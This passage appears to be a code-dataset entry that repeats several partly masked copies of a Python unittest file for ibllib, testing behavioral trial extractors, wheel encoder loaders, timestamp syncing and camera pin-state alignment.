'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass 
TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, 
take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in 
data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n 
<function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n 
self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass 
TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, 
display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = 
biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def 